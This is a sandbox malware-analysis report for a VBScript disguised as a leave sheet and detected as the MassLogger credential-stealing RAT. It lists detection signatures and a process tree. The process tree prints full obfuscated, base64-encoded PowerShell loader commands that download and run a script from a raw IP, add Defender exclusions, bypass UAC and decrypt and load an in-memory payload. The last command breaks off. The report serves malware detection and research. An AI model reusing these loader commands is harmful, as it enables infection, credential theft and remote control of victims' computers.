Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Annual Leave sheet 2025.vbs

Overview

General Information

Sample name:Annual Leave sheet 2025.vbs
Analysis ID:1596083
MD5:d6afdc37cc7ca3efc5ff4047f5f42383
SHA1:990d388dcc95d4b8780cb7b0a6f7e42178dfa918
SHA256:034393b0eb32639588f54d54f300c1898318e0bc92f2227130c9db95ec3cb2b6
Tags:vbsuser-abuse_ch
Infos:

Detection

MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Register Wscript In Run Key
VBScript performs obfuscated calls to suspicious functions
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains a sample name check
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
AI detected suspicious sample
Bypasses PowerShell execution policy
Contains functionality to capture screen (.Net source)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: DeviceCredentialDeployment Execution
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 5364 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Annual Leave sheet 2025.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 5064 cmdline: "C:\Windows\system32\cmd.exe" "/C poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6756 cmdline: poWeRSHELL.eXe -EX uNrEsTRICtEd -nOp -w 1 -c DEvIcECREDentiaLdEplOyMEnT ; InvOke-eXpRESsIOn($(invOke-EXpResSioN('[sYstEm.texT.ENcOdiNg]'+[ChaR]0x3A+[cHar]0x3a+'Utf8.gEtSTrING([systEm.convERt]'+[CHAR]0x3A+[cHar]0X3a+'fRomBAse64strINg('+[ChAr]34+'DQogICAgICAgICRXZEFSayA9IEFEZC10eVBlIC1NZW1CZVJkRUZJbklUSU9uICdbRGxsSW1wb3J0KCJ1UkxNb04iLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHpXLCBzdHJpbmcgSHl0bFlaR3dPRlQsIHN0cmluZyB0c3RmeVUsIHVpbnQgb2xhbEJOTmZMU0ssIEludFB0ciBUaUxpKTsnIC1uQW1lICJwdWxoY0d2aUFQIiAtTkFNRXNwYUNlIFBhc1FJd3BEWSAtUGFzc1RocnU7IA0KICAgICAgICAkV2RBUms6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly80NS4yMDAuMTQ5LjEwNDo1MDAwL2Rvd25sb2FkL25vdmFfa2F5Y2VlLnZicyIsIiRlTlY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyIsMCwwKTsgDQogICAgICAgIHNUQXJULXNMZUVwKDMpOyANCiAgICAgICAgaW5Wb0tlLWVYcHJFc1NpT24gIiRFTnY6QVBQREFUQVx3aW5kb3dzdXBkYXRlLnZiUyINCiAgICAgICAg'+[cHAr]0X22+'))')))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • csc.exe (PID: 1632 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ilcg05nv.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
          • cvtres.exe (PID: 5292 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES509F.tmp" "c:\Users\user\AppData\Local\Temp\CSC8F7BB283C99B46799FCDCA9D84A75A0.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 1816 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\windowsupdate.vbS" MD5: A47CBE969EA935BDD3AB568BB126BC80)
          • cmd.exe (PID: 4524 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\c.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 4836 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cmd.exe (PID: 5432 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Local\Temp\c.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 1276 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRnbm5icmFkeXV6emFpY3F6amdvdWx3dmRhPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJ3anZwYWpycHV3ZHZraHZlb3R5dmFzbGIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuQ29weVRvKCRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuRGlzcG9zZSgpOwkkYndqdnBhanJwdXdkdmtodmVvdHl2YXNsYi5EaXNwb3NlKCk7CSRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiLkRpc3Bvc2UoKTsJJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGIuVG9BcnJheSgpO31mdW5jdGlvbiBxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbGJwYnNmYnhoZ3FrdHh2amxudHJ4Yndta3pmbHFwa3NqYmZ6b3didT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2PSRsYnBic2ZieGhncWt0eHZqbG50cnhid21remZscXBrc2piZnpvd2J1LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29BQkNpQUJDbkFCQ3RBQkM7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2LkFCQ0lBQkNuQUJDdkFCQ29BQkNrQUJDZUFCQygkbnVsbCwgJHBhcmFtMl92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpO30kcW1ka3hmZndnbGliZXJiZWl1eGFvZnJnbyA9ICRlbnY6VVNFUk5BTUU7JG1scXhnYmJ4cnl1dnR6c29lY3ZmcWl5enQgPSAnQzpcVXNlcnNcJyArICRxbWRreGZmd2dsaWJlcmJlaXV4YW9mcmdvICsgJ0FCQ1xBQkNkQUJDd0FCQ21BQkMuQUJDYkFCQ2FBQkN0QUJDJy5SZXBsYWNlKCdBQkMnLCAnJyk7JGhvc3QuVUkuUmF3VUkuV2luZG93VGl0bGUgPSAkbWxxeGdiYnhyeXV2dHpzb2VjdmZxaXl6dDskdWR5eHI9W1N5c3RlbS5JTy5GaWxlXTo6KCd0eGVUbGxBZGFlUidbLTEuLi0xMV0gLWpvaW4gJycpKCRtbHF4Z2JieHJ5dXZ0enNvZWN2ZnFpeXp0KS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkeWRhIGluICR1ZHl4cikgewlpZiAoJHlkYS5TdGFydHNXaXRoKCc6OicpKQl7CQkkZG5xZWw9JHlkYS5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kdnRzcHN1bmViZWl0bXlzbHNnamhqemFncz1bc3RyaW5nW11dJGRucWVsLlNwbGl0KCdcJyk7SUVYICckcHpvY2V4eW52bmh0dG9jd3NuenhlY25xcD1pYnB4Z21oanR3a2Jnem4gKHlsY2Z4ZmV0ZHdqc2RpciAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCR2dHNwc3VuZWJlaXRteXNsc2dqaGp6YWdzWzBdKSkpOycuUmVwbGFjZSgnQUJDJywgJycpO0lFWCAnJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGs9aWJweGdtaGp0d2tiZ3puICh5bGNmeGZldGR3anNkaXIgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkdnRzcHN1bmViZWl0bXlzbHNnamhqemFnc1sxXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuICRwem9jZXh5bnZuaHR0b2N3c256eGVjbnFwICRudWxsO3FtYWlubW14bnpheHpocm9od2xoeHBwcm4gJGV3Ym5ud3Rtd2R1emN4aGtncmtrcnlyaGsgKCxbc3RyaW5nW11dICgnJUFCQycpKTs=')) | Invoke-Expression" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • WerFault.exe (PID: 1632 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5044 -ip 5044 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • wscript.exe (PID: 7476 cmdline: "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_706.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • cmd.exe (PID: 7540 cmdline: "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 7584 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7628 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyRid2p2cGFqcnB1d2R2a2h2ZW90eXZhc2xiPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGI9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQUJDTUFCQ2VBQkNtQUJDb0FCQ3JBQkN5QUJDU0FCQ3RBQkNyQUJDZUFCQ2FBQkNtQUJDOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRnbm5icmFkeXV6emFpY3F6amdvdWx3dmRhPU5ldy1PYmplY3QgU3lzdGVtLklPLkNBQkNvbUFCQ3ByQUJDZUFCQ3NzQUJDaW9BQkNuLkFCQ0daQUJDaXBBQkNTdEFCQ3JlQUJDYW1BQkMoJGJ3anZwYWpycHV3ZHZraHZlb3R5dmFzbGIsIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuQ29weVRvKCRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiKTsJJGdubmJyYWR5dXp6YWljcXpqZ291bHd2ZGEuRGlzcG9zZSgpOwkkYndqdnBhanJwdXdkdmtodmVvdHl2YXNsYi5EaXNwb3NlKCk7CSRxYmpqbmR4dXB2bmppc3F5anpkamlsemxiLkRpc3Bvc2UoKTsJJHFiampuZHh1cHZuamlzcXlqemRqaWx6bGIuVG9BcnJheSgpO31mdW5jdGlvbiBxbWFpbm1teG56YXh6aHJvaHdsaHhwcHJuKCRwYXJhbV92YXIsJHBhcmFtMl92YXIpewkJSUVYICckbGJwYnNmYnhoZ3FrdHh2amxudHJ4Yndta3pmbHFwa3NqYmZ6b3didT1bU3lzdGVtLlJBQkNlQUJDZmxBQkNlY3RBQkNpb0FCQ24uQUJDQXNBQkNzZUFCQ21iQUJDbEFCQ3lBQkNdOjpMQUJDb0FCQ2FBQkNkQUJDKFtieXRlW11dJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJHhkYnZhb3FpdGxhaWJtY2tlY3F0enFocnd4YXJyd3VvbXp0dWFhbHZpd3Jmb2JyeHl2PSRsYnBic2ZieGhncWt0eHZqbG50cnhid21remZscXBrc2piZnpvd2J1LkFCQ0VBQkNuQUJDdEFCQ3JBQkN5QUJDUEFCQ29B